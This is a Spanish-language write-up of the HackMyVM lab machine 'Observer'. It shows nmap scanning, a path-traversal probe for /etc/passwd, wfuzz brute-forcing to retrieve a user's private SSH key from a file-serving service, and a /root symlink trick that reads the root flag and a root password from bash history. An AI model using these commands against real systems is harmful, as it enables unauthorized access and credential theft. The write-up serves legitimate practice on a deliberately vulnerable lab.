Observer
Volvemos a la carga con otra máquina easy de HackMyVM creada por sML, donde hay un servicio el cual explotaremos tanto para entrar al sistema como para ser root
Reconocimiento de Puertos
Como siempre, empezaremos realizando el reconocimiento de puertos con un pequeño script que creé para automatizar este proceso inicial:
❯ sudo nmapauto
[*] La IP de la máquina víctima es 192.168.1.26
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 13:17 CET
Initiating ARP Ping Scan at 13:17
Scanning 192.168.1.26 [1 port]
Completed ARP Ping Scan at 13:17, 0.06s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:17
Scanning 192.168.1.26 [65535 ports]
Discovered open port 22/tcp on 192.168.1.26
Discovered open port 3333/tcp on 192.168.1.26
Completed SYN Stealth Scan at 13:17, 1.56s elapsed (65535 total ports)
Nmap scan report for 192.168.1.26
Host is up, received arp-response (0.00012s latency).
Scanned at 2023-12-10 13:17:51 CET for 1s
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack ttl 64
3333/tcp open dec-notes syn-ack ttl 64
MAC Address: 08:00:27:73:9E:74 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.80 seconds
Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)
[*] Escaneo avanzado de servicios
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-10 13:17 CET
Nmap scan report for 192.168.1.26
Host is up (0.00020s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 9.2p1 Debian 2 (protocol 2.0)
| ssh-hostkey:
| 256 06:c9:a8:8a:1c:fd:9b:10:8f:cf:0b:1f:04:46:aa:07 (ECDSA)
|_ 256 34:85:c5:fd:7b:26:c3:8b:68:a2:9f:4c:5c:66:5e:18 (ED25519)
3333/tcp open dec-notes?
| fingerprint-strings:
| FourOhFourRequest:
| HTTP/1.0 200 OK
| Date: Sun, 10 Dec 2023 12:19:30 GMT
| Content-Length: 105
| Content-Type: text/plain; charset=utf-8
| OBSERVING FILE: /home/nice ports,/Trinity.txt.bak NOT EXIST
| <!-- lgTeMaPEZQleQYhYzRyWJjPjzpfRFEHMV -->
| GenericLines, Help, Kerberos, LPDString, RTSPRequest, SSLSessionReq, TLSSessionReq, TerminalServerCookie:
| HTTP/1.1 400 Bad Request
| Content-Type: text/plain; charset=utf-8
| Connection: close
| Request
| GetRequest:
| HTTP/1.0 200 OK
| Date: Sun, 10 Dec 2023 12:19:05 GMT
| Content-Length: 78
| Content-Type: text/plain; charset=utf-8
| OBSERVING FILE: /home/ NOT EXIST
| <!-- XVlBzgbaiCMRAjWwhTHctcuAxhxKQFHMV -->
| HTTPOptions:
| HTTP/1.0 200 OK
| Date: Sun, 10 Dec 2023 12:19:05 GMT
| Content-Length: 78
| Content-Type: text/plain; charset=utf-8
| OBSERVING FILE: /home/ NOT EXIST
|_ <!-- DaFpLSjFbcXoEFfRsWxPLDnJObCsNVHMV -->
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3333-TCP:V=7.94SVN%I=7%D=12/10%Time=6575AC77%P=x86_64-pc-linux-gnu%
SF:r(GenericLines,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\
SF:x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20B
SF:ad\x20Request")%r(LPDString,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nC
SF:ontent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\
SF:n\r\n400\x20Bad\x20Request")%r(GetRequest,C3,"HTTP/1\.0\x20200\x20OK\r\
SF:nDate:\x20Sun,\x2010\x20Dec\x202023\x2012:19:05\x20GMT\r\nContent-Lengt
SF:h:\x2078\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nOBSERV
SF:ING\x20FILE:\x20/home/\x20NOT\x20EXIST\x20\n\n\n<!--\x20XVlBzgbaiCMRAjW
SF:whTHctcuAxhxKQFHMV\x20-->")%r(HTTPOptions,C3,"HTTP/1\.0\x20200\x20OK\r\
SF:nDate:\x20Sun,\x2010\x20Dec\x202023\x2012:19:05\x20GMT\r\nContent-Lengt
SF:h:\x2078\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\n\r\nOBSERV
SF:ING\x20FILE:\x20/home/\x20NOT\x20EXIST\x20\n\n\n<!--\x20DaFpLSjFbcXoEFf
SF:RsWxPLDnJObCsNVHMV\x20-->")%r(RTSPRequest,67,"HTTP/1\.1\x20400\x20Bad\x
SF:20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnectio
SF:n:\x20close\r\n\r\n400\x20Bad\x20Request")%r(Help,67,"HTTP/1\.1\x20400\
SF:x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nC
SF:onnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(SSLSessionReq,67,"
SF:HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20c
SF:harset=utf-8\r\nConnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(T
SF:erminalServerCookie,67,"HTTP/1\.1\x20400\x20Bad\x20Request\r\nContent-T
SF:ype:\x20text/plain;\x20charset=utf-8\r\nConnection:\x20close\r\n\r\n400
SF:\x20Bad\x20Request")%r(TLSSessionReq,67,"HTTP/1\.1\x20400\x20Bad\x20Req
SF:uest\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nConnection:\x2
SF:0close\r\n\r\n400\x20Bad\x20Request")%r(Kerberos,67,"HTTP/1\.1\x20400\x
SF:20Bad\x20Request\r\nContent-Type:\x20text/plain;\x20charset=utf-8\r\nCo
SF:nnection:\x20close\r\n\r\n400\x20Bad\x20Request")%r(FourOhFourRequest,D
SF:F,"HTTP/1\.0\x20200\x20OK\r\nDate:\x20Sun,\x2010\x20Dec\x202023\x2012:1
SF:9:30\x20GMT\r\nContent-Length:\x20105\r\nContent-Type:\x20text/plain;\x
SF:20charset=utf-8\r\n\r\nOBSERVING\x20FILE:\x20/home/nice\x20ports,/Trini
SF:ty\.txt\.bak\x20NOT\x20EXIST\x20\n\n\n<!--\x20lgTeMaPEZQleQYhYzRyWJjPjz
SF:pfRFEHMV\x20-->");
MAC Address: 08:00:27:73:9E:74 (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.88 seconds
[*] Escaneo completado, se ha generado el fichero InfoPuertos
Vemos que tenemos SSH y un puerto con un servicio extraño, veamos que nos muestra por HTTP:
❯ curl http://192.168.1.26:3333
OBSERVING FILE: /home/ NOT EXIST
<!-- EkXBAkjQZLCtTMtTCoaNatyyiNKAReHMV -->%
Parece que muestra el contenido de ficheros, realizamos alguna prueba y tratamos de cargar el /etc/passwd:
❯ curl http://192.168.1.26:3333/note
OBSERVING FILE: /home/note NOT EXIST
<!-- mBTvKSJfjzaLbtZsyMGeuDtRzQMDQiHMV -->%
❯ curl http://192.168.1.26:3333/../etc/passwd
OBSERVING FILE: /home/etc/passwd NOT EXIST
<!-- updOMeRVjaRzLNTXYeUCWKsXbGyRAOHMV -->%
Parece que tiene una medida implementada para evitar saltar de directorio hacia arriba. De esta manera, ya que no podemos revisar los usuarios del sistema, podemos intentar sacarlos por fuerza bruta poniendo como objetivo la clave privada de SSH. En este caso, dejaremos de lado nuestro querido Gobuster (ya que hasta donde yo sé no permite personalizar puertos) por Wfuzz, poniendo que nos filtre los resultados de 3 líneas:
❯ wfuzz -c -t 200 --hc=404 -w /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -u http://192.168.1.26:3333/FUZZ/.ssh/id_rsa --hl 3
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.26:3333/FUZZ/.ssh/id_rsa
Total requests: 8295455
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002462: 200 38 L 44 W 2602 Ch "jan"
!Bingo! Hemos encontrado el usuario y su clave privada, así que vamos a copiarla, cambiarle los permisos y acceder al sistema por SSH como Jan:
❯ curl http://192.168.1.26:3333/jan/.ssh/id_rsa > id_rsa
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
100 2602 0 2602 0 0 2339k 0 --:--:-- --:--:-- --:--:-- 2541k
❯ chmod 600 id_rsa
❯ ssh -i id_rsa jan@192.168.1.26
Linux observer 6.1.0-11-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.38-4 (2023-08-08) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Dec 9 12:32:39 2023 from 192.168.1.150
jan@observer:~$
Ya estamos dentro, solo falta leer la flag de user:
jan@observer:~$ ls
user.txt
jan@observer:~$ cat user.txt
HMVXXXXXXXXXXXXXXXXXXP7
Escalada de privilegios
Tras revisar un rato, no veo nada interesante, por lo que quizá, podamos leer la flag de root creando un enlace simbólico desde nuestro directorio de trabajo al de root:
jan@observer:~$ ln -s /root rooter
Y ahora desde mi equipo intento leerla:
❯ curl http://192.168.1.26:3333/jan/rooter/root.txt
HMVXXXXXXXXXXXXXXXXXXH1
Pues ha funcionado, con esto tendríamos la máquina resuelta, no obstante, si leemos el historial, podemos encontrar la contraseña de root:
❯ curl http://192.168.1.26:3333/jan/rooter/.bash_history
ip a
exit
apt-get update && apt-get upgrade
apt-get install sudo
cd
wget https://go.dev/dl/go1.12.linux-amd64.tar.gz
tar -C /usr/local -xzf go1.12.linux-amd64.tar.gz
rm go1.12.linux-amd64.tar.gz
export PATH=$PATH:/usr/local/go/bin
nano observer.go
go build observer.go
mv observer /opt
ls -l /opt/observer
crontab -e
nano root.txt
chmod 600 root.txt
nano /etc/sudoers
nano /etc/ssh/sshd_config
paswd
fuck1ng0bs3rv3rs
passwd
su jan
nano /etc/issue
nano /etc/network/interfaces
ls -la
exit
ls -la
cat .bash_history
ls -la
ls -la
cat .bash_history
ls -l
cat root.txt
cd /home/jan
ls -la
cat user.txt
su jan
reboot
shutdown -h now
Agradecer como siempre el trabajo de smL por la plataforma y estas máquinas que nos hacen siempre salir fuera de la caja y pensar en cosas nuevas.